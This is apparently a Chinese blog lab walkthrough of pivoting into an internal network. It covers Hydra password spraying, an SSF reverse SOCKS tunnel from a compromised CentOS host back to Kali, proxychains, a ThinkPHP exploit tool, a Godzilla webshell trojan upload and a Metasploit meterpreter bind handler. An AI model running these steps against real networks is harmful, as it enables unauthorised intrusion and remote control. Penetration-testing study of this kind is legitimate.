内网穿透-SSF内网穿透反向socks代理之渗透内网thinkphp主机上线msf

1 ssf 简介

Secure Socket Funneling socks正反向代理,linux版较好的免杀

1.1下载地址

https://github.com/securesocketfunneling/ssf

1.2下载编译好的执行文件

https://github.com/securesocketfunneling/ssf/releases/tag/3.0.0

2.环境

img

kali 攻击机 网卡 桥接模式 ip 192.168.1.6

跳板机 centos 网卡1 桥接模式 ip 192.168.1.8 网卡2 仅主机模式 ip 10.10.10.88

目标机器 win2012 网卡 仅主机模式 10.10.10.13

3.ssf socks 反向代理

3.0 kali 上执行hydra 密码喷洒获取centos的账号密码

3.1. wegt https://github.com/securesocketfunneling/ssf/releases/download/3.0.0/ssf-linux-x86_64-3.0.0.zip

3.2 解压

unzip ssf-linux-x86_64-3.0.0.zip

3.3.kali上运行,监听1616端口

./ssfd -p 1616 &

3.4跳板机运行ssf ,链接kali的1616端口并且在kali上开启1080端口监听

./ssf -F 1080 192.168.1.6 -p 1616 &

4.代理工具proxychains的设

vi /etc/proxychains4.conf

socks5 127.0.0.1 1080

5.自身不支持代理的渗透工具可以用proxychains设置代理渗透内部网络

5.1 内网桌面链接rdesktop

proxychains rdesktop 10.10.10.13

5.2 burp通过proxychains代理渗透内网

proxychains java -jar burpsuite.jar

5.3 火狐等浏览器设置代理

Network Settings-》settings-》Manual proxy configuration-》SOCKS Host 填写kali ip地址 192.168.1.6,端口是1080

5.4thinkphp 利用工具

github 搜索 thinkphp 综合利用

5.5 启动 thinkphp.jar

#proxychains /usr/local/jdk1.8.0_301/bin/java -jar ThinkPHP.jar

5.6 启动哥斯拉,设置代理,管理shell上传正向木马,运行木马

5.7利用代理启动msf

proxychains msfconsole

5.8正向链接内网的木马

msf6 > use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set rhost 10.10.10.13

set lport 1616

run

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值